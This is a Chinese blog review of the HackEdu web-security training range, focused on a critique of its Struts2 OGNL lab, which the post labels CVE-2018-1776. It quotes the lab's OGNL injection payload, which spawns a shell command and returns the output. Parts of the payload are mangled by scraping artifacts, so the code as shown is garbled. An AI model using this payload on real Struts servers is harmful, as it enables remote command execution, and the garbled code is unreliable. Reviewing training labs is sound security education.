HackEdu 试用

Author Avatar
琉璃 4月 20, 2019

初见

登陆后的主页经常刷不出来。只会有一个骨架屏在那,内容始终无法获得。看了一下Console,似乎是资源下载失败,大大的404在Console里打印出来。

这个网站主要提供教学式靶场。一个页面分为两部分,左边是教学,类似一些实验指导和漏洞的介绍。右边则是Web页面。这个靶场主要提供Web方向的漏洞。右边的Web页面上除了目标网站,还会有一些必要的小工具,比如Kali的虚拟机,已经构造好的上传文件。在Web页面的上方是拦截请求。Web页面的源码可以很容易的看见。有些时候甚至可以看到后端的代码。HackEdu还很良心的提供两种到三种不同语言的相同后端代码(竟然还有Python2.7)。使用者可以自行为这些后端代码打上补丁,之后再试一下漏洞还是否存在。这算是攻防一起锻炼了。

一年的订阅价格是750刀,HackerEdu主要的实验为OWASP Top10的漏洞,很少的原生App的实验(这个得订阅才能体验,我也没用过),一些公开的漏洞,还有比较拟真的CTF。

CVE-2018-1776

我试了一下这个漏洞的实验。实验的步骤倒是不缺,由于跳过了环境配置的步骤,实验指南主要介绍背景知识,漏洞成因,和利用。

由于这是一个关于Struts2 NameSpace和 OGNL的漏洞,指南里便介绍了一下这两个概念。我感觉解释的并不够详细。例子是有,但是对例子没有解释。

漏洞的成因也是将流程和逻辑上的原因讲解了一下,并没有深入到源码上。对于Apache的补丁也是顺口带了一句。

漏洞的利用提供了手动和自动两种方式,提供了Payload,但是对Payload没有任何的解释。我看的是一脸懵逼。

${(#_memberAccess['allowStaticMethodAccess']=true).(#cmd='hostname').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','c',#cmd}:{'bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros )).(#ros.flush())}

总体来说,说明不够清楚(虽然在开头有一个到报告的链接),实验部分并没有什么出彩的地方。这个实验并不能看到后端的代码。还是希望深度能有所加深,并不是停留在简单Exploit的层面。

This blog is under a CC BY-NC-SA 3.0 Unported License
本文链接:https://www.inevitable.tech/posts/ed65a4a4/